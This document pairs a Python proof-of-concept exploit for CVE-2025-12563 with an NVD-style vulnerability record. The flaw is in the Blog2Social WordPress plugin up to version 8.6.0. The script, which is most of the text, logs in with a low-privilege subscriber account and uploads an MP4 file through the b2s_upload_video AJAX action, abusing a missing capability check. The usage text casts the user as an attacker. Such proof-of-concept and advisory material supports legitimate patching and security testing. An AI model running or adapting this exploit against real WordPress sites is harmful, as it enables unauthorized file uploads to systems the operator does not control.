CVE-2025-12563

#!/usr/bin/env python3 """ CVE-2025-12563 PoC - Blog2Social Plugin File Upload Vulnerability Affected: Blog2Social <= 8.6.0 Type: Incorrect Capability Check leading to Limited File Upload """ import requests import sys from urllib.parse import urljoin def exploit_cve_2025_12563(target_url, username, password, mp4_file_path): """ Exploit for Blog2Social uploadVideo() function privilege escalation Requirements: - Valid WordPress subscriber+ account - MP4 file to upload """ # Setup session session = requests.Session() # Login to WordPress login_url = urljoin(target_url, '/wp-login.php') login_data = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': '/wp-admin/', 'testcookie': '1' } print(f'[*] Logging in as {username}...') response = session.post(login_url, data=login_data, allow_redirects=True) if 'wordpress_logged_in' not in str(session.cookies): print('[-] Login failed!') return False print('[+] Login successful!') # Prepare MP4 file upload upload_url = urljoin(target_url, '/wp-admin/admin-ajax.php') with open(mp4_file_path, 'rb') as f: mp4_content = f.read() # Construct multipart form data for uploadVideo() files = { 'file': ('malicious.mp4', mp4_content, 'video/mp4'), } data = { 'action': 'b2s_upload_video', 'post_id': '0' } print(f'[*] Uploading MP4 file to {target_url}...') response = session.post(upload_url, data=data, files=files) if response.status_code == 200: result = response.json() if response.headers.get('content-type', '').find('json') != -1 else {} if result.get('success') or 'url' in result: upload_url = result.get('url', 'Unknown') print(f'[+] File uploaded successfully!') print(f'[+] File URL: {upload_url}') return True elif 'error' in result: print(f'[-] Upload failed: {result["error"]}') return False print(f'[*] Response: {response.status_code}') print(f'[*] Response body: {response.text[:500]}') return False if __name__ == '__main__': if len(sys.argv) < 5: print('Usage: python cve-2025-12563.py <target_url> <username> <password> <mp4_file>') print('Example: python cve-2025-12563.py http://example.com/ attacker password malicious.mp4') sys.exit(1) target = sys.argv[1] user = sys.argv[2] pwd = sys.argv[3] mp4 = sys.argv[4] exploit_cve_2025_12563(target, user, pwd, mp4)

{"cve": {"id": "CVE-2025-12563", "sourceIdentifier": "[email protected]", "published": "2025-11-06T05:16:05.130", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Blog2Social: Social Media Auto Post & Scheduler plugin for WordPress is vulnerable to limited file upload due to an incorrect capability check on theuploadVideo() function in all versions up to, and including, 8.6.0. This makes it possible for authenticated attackers, with Subscriber-level access and above, to upload mp4 files to the 'wp-content/uploads/<YYYY>/<MM>/' directory."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/3389636/blog2social", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/3710f139-0f17-426c-b48c-4c42ae4bab5f?source=cve", "source": "[email protected]"}]}}